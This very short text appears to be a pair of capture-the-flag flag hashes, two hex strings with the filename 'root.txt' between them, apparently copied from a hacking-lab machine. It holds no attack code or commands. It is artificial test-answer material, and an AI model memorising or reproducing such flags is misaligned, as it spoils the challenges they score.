3b99fbdc6d430bfb51c72c651a261927

root.txt
7958b569565d7bd88d10c6f22d1c4063